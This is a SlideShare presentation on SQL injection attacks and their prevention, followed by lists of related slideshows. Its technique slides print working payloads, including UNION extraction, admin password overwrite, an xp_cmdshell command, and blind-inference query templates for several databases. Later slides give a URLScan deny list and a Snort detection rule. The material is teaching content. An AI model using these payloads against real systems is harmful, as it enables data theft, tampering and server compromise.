SlideShare une entreprise Scribd logo

Web application attacks using Sql injection and countermasures

Télécharger en tant que PPT, PDF
Cade Zvavanjanja
Cade Zvavanjanja

An advanced technical presentation on attacking Web applications using sql injection technique and the countermeasures.

Technologie
1  sur  49
SQL INJECTION ATTACKS Cade Zvavanjanja CISO Gainful Information Security Introduction Background Techniques Prevention Demo Conclusions Questions
OUTLINE  Background of SQL Injection  Techniques and Examples  Preventing SQL Injection  Demo  Wrap-Up  Questions Introduction Background Techniques Prevention Demo Conclusions Questions
BACKGROUND OF SQL INJECTION Introduction Background Techniques Prevention Demo Conclusions Questions
DATABASES: WHERE ARE THEY NOW? Fat Server Fat Client Fat Server & Fat Client Mainframes X Desktop Apps X Web Apps X Introduction Background Techniques Prevention Demo Conclusions Questions
WHY IS SQL A STANDARD? Relational Database Platform Runtime Loose Interpretation Independence Semantics Introduction Background Techniques Prevention Demo Conclusions Questions
FLEXIBILITY = VULNERABILITY  Simple Injection  Decoding Error Messages  Blind Injection  Encoding Exploits  Stored Procedures ---  Programmer Error (Faulty Logic) Introduction Background Techniques Prevention Demo Conclusions Questions
SQL Injection Techniques Introduction Background Techniques Prevention Demo Conclusions Questions
IMPORTANT SYMBOLS ‘  “Hack” --  “Comment Out” ;  “End Statement” %,*  “Wildcards”
SQL INJECTION DEFINITION The input field is modified in such a way that the Database returns unintended data. Sql: SELECT <column name> FROM <Table name> WHERE <logic expression>
EXAMPLE: DATABASE SCHEMA  Table Users  Has columns “username” and “password”  Accessed when users log in  Table Customers  Has column “phone”  Users can look up other customer phone numbers by name  Application does no input validation Introduction Background Techniques Prevention Demo Conclusions Questions
RETURNING EXTRA ROWS WITH “UNION”  Query: SELECT phone FROM Customers WHERE last_name = ‘<name>’  Input: x’ UNION SELECT username FROM users WHERE ‘x’ = ‘x Introduction Background Techniques Prevention Demo Conclusions Questions
MODIFYING RECORDS  Application has password changing page  SQL: UPDATE users SET password = ‘<newpassword>’ WHERE username = ‘<username>’  Input: newpassword’ WHERE username LIKE ‘%admin%’ -- Introduction Background Techniques Prevention Demo Conclusions Questions
MS SQL SERVER  Default SQL Server setup  Defaultsystem admin account “sa” enabled  No password!!!  Supports multiple queries  “Extended stored procedures”: C/C++ DLL files  Read/writeexternal files  Access command line Introduction Background Techniques Prevention Demo Conclusions Questions
EXPLOITING SQL SERVER  Use phone look-up query again: SELECT phone FROM customers WHERE last_name = ‘<name>’  Input: '; exec master..xp_cmdshell 'iisreset'; -- Introduction Background Techniques Prevention Demo Conclusions Questions
DATA-MINING WITH SQL INJECTION  Three classes of data-mining  In-band  Out-of-band  Inference
IN-BAND ATTACKS  Data is included in response from the web server  Could be a well rendered web page  Using UNION SELECTS  Error messages
OUT-OF-BAND ATTACKS  Data is retrieved using another communication channel:  UTL_HTTP.REQUEST  OPENROWSET  XP_SENDMAIL
INFERENCE ATTACKS  At the core of inference is a question  Action taken based upon the answer  Chris Anley’s time delay: declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'
INFERENCE ATTACKS…CONT:  Examples:  Time Delay  Generate 200/500 responses  Response Variation  Wildly Silly Example – send mail to tech support of XYZ Corp about modem problem or monitor problem – if the call comes about a modem problem we know the answer
INFERENCE ATTACKS…CONT:  CASE statements in SQL: SELECT CASE WHEN condition THEN do_one_thing ELSE do_another END
INFERENCE THROUGH WEB SERVER RESPONSE CODES  Need query that will compile fine but generate error on branch execution: SELECT CASE WHEN condition THEN 1 ELSE 1/0 END
INFERENCE THROUGH WEB SERVER RESPONSE CODES…CONT:  Notes:  Works well with SQL Server, Oracle, DB2  MySQL returns NULL  Informix ODBC driver returns 200 – even in event of error  Response code could be 302 Redirect, etc – principle is the same.  Leaves a large number of 500 response in log files  App Environments like PL/SQL will return 404 instead of 500
INFERENCE THROUGH RESPONSE VARIATIONS:  Parameter Splitting and Balancing  Avoids 500 responses
PARAMETER SPLITTING AND BALANCING  ‘NGSSOFTWARE’  ‘NGSSOFTWA’+’RE’  ‘NGSSOFTWA’||’RE’  ‘NGSSOFTWA’|| (SUBSELECT RETURNS R) || ‘E’  ‘NGSSOFTWA’ + (SUBSELECT RETURNS R) + ‘E’  2 1 +1  1 + (SUBSELECT RETURNS 1)
DEALING WITH VARIOUS APPLICATION ENVIRONMENTS  Cold Fusion Management  Converts “ to &quot;  Converts & to &amp;  Converts > to &gt;  Converts < to &lt;  Doubles up single quotes  Usually means attack vector is numeric input  PHP often doubles single quote – magic quotes
DEALING WITH VARIOUS APPLICATION ENVIRONMENTS… CONT:  Rather than > use BETWEEN X AND Y  Rather than & use ^ A xor BIT = C  if C is greater than A then Bit is not set  If C is less than A then Bit is set  Rather than ‘A’ use CHR(65)/CHAR(65)
INFERENCE QUERIES…  SQL Server – String data ' + (select case when ascii(substring((sub-query),the_byte,1))^the_bit between 0 and ascii(substring((sub- query),the_byte,1)) then char(known_value) else char(1/0) end) + '
INFERENCE QUERIES…  Oracle – Numeric + (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then 0 else 1/0 end from dual)
INFERENCE QUERIES…  Oracle – String data '|| (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then chr(known_val) else chr(1/0) end from dual) ||'
INFERENCE QUERIES…  MySQL – Numeric + (select case when (ascii(substring((sub- query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end (uses page response variation)
INFERENCE QUERIES…  MySQL – String Data ' + (select case when (ascii(substring((sub- query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end) + ‘ (one returns no recordset – the other returns all rows)
INFERENCE QUERIES…  Informix – Numeric + (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",12 6,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1", 49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@", 64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72," I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",8 1,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z ",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",1 04,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p", 112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119," x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 1 else (1/bitval(2,1)) end from sysmaster:informix.systables)-1
INFERENCE QUERIES…  Informix – String data ' || (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",12 6,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1", 49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@", 64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72," I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",8 1,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z ",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",1 04,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p", 112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119," x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 'xFC' else (1/bitval(2,1))::char end from sysmaster:informix.systables) ||'
PREVENTING SQL INJECTION Introduction Background Techniques Prevention Demo Conclusions Questions
PREVENTING SQL INJECTION Input Validation Input Checking Functions Access Rights User Permissions Variable Placeholders Stored Procedures Introduction Background Techniques Prevention Demo Conclusions Questions
INPUT VALIDATION  Checks  Type  Size  Format  Range  Replace quotation marks “All input is wrong and dangerous” Introduction Background Techniques Prevention Demo Conclusions Questions
INPUT CHECKING FUNCTIONS  Built in character rejection $sql = “SELECT * FROM Users WHERE ID = ‘” . $_GET[‘id’] . “’”; $sql = “SELECT * FROM Users WHERE ID =” . mysql_real_escape_string($_GET[‘id’] ); $result = mysql_query($sql); Introduction Background Techniques Prevention Demo Conclusions Questions
ACCESS RIGHTS Web User vs. System Administrator – ‘sa’ Introduction Background Techniques Prevention Demo Conclusions Questions
USER PERMISSIONS  Limit query access rights  SELECT  UPDATE  DROP  Restricted statement access  Global-specific  Database-specific  Table-specific Introduction Background Techniques Prevention Demo Conclusions Questions
VARIABLE PLACEHOLDERS (?)  Defense from String Concatenation  Enforcing database data types PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?"); prep.setString(1, pwd); Introduction Background Techniques Prevention Demo Conclusions Questions
STORED PROCEDURES  Use error checking variables  Buffer direct database access Introduction Background Techniques Prevention Demo Conclusions Questions
DEMONSTRATION Introduction Background Techniques Prevention Demo Conclusions Questions
COUNTERMEASURES  System Administrators  White List / Blacklist Input Validation  Least Privileges  Application firewalls  Developer  StoredProcedures  Parameterized queries  Exception handling
WHITELIST INPUT VALIDATION  UrlScan v3.0  restricts the types of HTTP requests that IIS will process [SQL Injection Headers] AppliesTo=.asp,.aspx [SQL Injection Headers Strings] -- @ ; also catches @@ alter delete drop exec insert alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection "; flow:to_server,established;  SNORT uricontent:".php | .aspx | .asp"; pcre:"/(%27)|(')|(--)|(%23)|(#)/i";  Create rule to check for SQL attack classtype:Web-application-attack; sid:9099; rev:5;)
LEAST PRIVILEGES  Enforce least privileges  CREATE / DELETE  Does not guarantee security  Access to portion of data  Create views
CONCLUSIONS  SQL Injection continues to evolve with new technologies  Dangerous Effects  Access to critical information  Updating data not meant to be updated  Exploiting DBMS to directly affect the server and its resources  Prevention of SQL Injection  Input Validation and Query Building  Permissions and Access Rights  Variable Placeholders (Prepare) and Stored Procedures Introduction Background Techniques Prevention Demo Conclusions Questions
QUESTIONS  1) What could prevent the ‘Students’ table from being dropped?  2) What is another way to prevent Injection? Introduction Background Techniques Prevention Demo Conclusions Questions
REFERENCES  Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter 27. Database Security." PHP Manual. 13 January 2005. PHP Documentation Group. 07 Apr. 2005 <http://www.php- center.de/en-html-manual/security.database.sql- injection.html>.  Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt, 1989. 427-433.  "Exploits of a Mom." xkcd.com. 4 Mar. 2008 <http://xkcd.com/327/>.  Finnigan, Pete. " SQL Injection and Oracle, Part One ." SecurityFocus 21 November 2002. 07 Apr 2005 <http://www.securityfocus.com/infocus/1644>.  Harper, Mitchell. "SQL Injection Attacks: Are You Safe?." Dev Articles. 29 May. 2002. 07 Apr. 2005 <http://www.devarticles.com/c/a/MySQL/SQL-Injection- Attacks-Are-You-Safe/2/>. Introduction Background Techniques Prevention Demo Conclusions Questions
Thank You Tel: +236 733 782 490 +263 773 796 365 +263 -4- 733 117 Eml: info@gis.co.zw cade@gis.co.zw Web: www.gis.co.zw Introduction Background Techniques Prevention Demo Conclusions Questions

Recommandé

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586Stacy Watts
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 

Recommandé

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586Stacy Watts
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection TutorialMagno Logan
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in PythonPublic Broadcasting Service
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSiddhesh Bhobe
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAbhinav Nair
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)n|u - The Open Security Community
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicJW CyberNerd
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and FallaciesKarwin Software Solutions LLC
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injectionavishkarm
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLPradeep Kumar
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Nuno Loureiro
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 

Contenu connexe

Tendances

A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection TutorialMagno Logan
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSiddhesh Bhobe
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicJW CyberNerd
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injectionavishkarm
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLPradeep Kumar
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Nuno Loureiro
 

Tendances (20)

Sql injection
Sql injectionSql injection
Sql injection
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? Infographic
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injection
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQL
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks
 

En vedette

Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Grand Parade Poland
 
Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures أحلام انصارى
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity FrameworksRich Helton
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheLeslie Samuel
 
Web Application Security II - SQL Injection
Web Application Security II - SQL InjectionWeb Application Security II - SQL Injection
Web Application Security II - SQL InjectionMd Syed Ahamad
 
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...Larissa Shapiro
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSskyhawk133
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 

En vedette (16)

Sql injection
Sql injectionSql injection
Sql injection
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
 
Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures
 
SQL injection and SYN attack
SQL injection and SYN attackSQL injection and SYN attack
SQL injection and SYN attack
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your Niche
 
Web Application Security II - SQL Injection
Web Application Security II - SQL InjectionWeb Application Security II - SQL Injection
Web Application Security II - SQL Injection
 
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads Up
 

Similaire à Web application attacks using Sql injection and countermasures

Sql injection
Sql injectionSql injection
Sql injectionBee_Ware
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...Karen Lopez
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptssuserde23af
 
Php classes in mumbai
Php classes in mumbaiPhp classes in mumbai
Php classes in mumbaiaadi Surve
 
Designer's Favorite New Features in SQLServer
Designer's Favorite New Features in SQLServerDesigner's Favorite New Features in SQLServer
Designer's Favorite New Features in SQLServerKaren Lopez
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300KOI Lastone
 
SQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageSQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageUlisses Castro
 
Advanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access from Programming LanguagesAdvanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access from Programming LanguagesS.Shayan Daneshvar
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
SQLCLR For DBAs and Developers
SQLCLR For DBAs and DevelopersSQLCLR For DBAs and Developers
SQLCLR For DBAs and Developerswebhostingguy
 
Dr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. HydeDr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. Hydewebhostingguy
 
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...Jürgen Ambrosi
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injectionnewbie2019
 

Similaire à Web application attacks using Sql injection and countermasures (20)

Sql
SqlSql
Sql
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
Sql injection
Sql injectionSql injection
Sql injection
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
 
Sql Injection V.2
Sql Injection V.2Sql Injection V.2
Sql Injection V.2
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).ppt
 
Php classes in mumbai
Php classes in mumbaiPhp classes in mumbai
Php classes in mumbai
 
Designer's Favorite New Features in SQLServer
Designer's Favorite New Features in SQLServerDesigner's Favorite New Features in SQLServer
Designer's Favorite New Features in SQLServer
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300
 
SQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageSQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data Leakeage
 
Advanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access from Programming LanguagesAdvanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access from Programming Languages
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
SQLCLR For DBAs and Developers
SQLCLR For DBAs and DevelopersSQLCLR For DBAs and Developers
SQLCLR For DBAs and Developers
 
Dr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. HydeDr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. Hyde
 
Mutant Tests Too: The SQL
Mutant Tests Too: The SQLMutant Tests Too: The SQL
Mutant Tests Too: The SQL
 
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 

Plus de Cade Zvavanjanja

Cade zvavanjanja saigf cybercrime &amp; security online
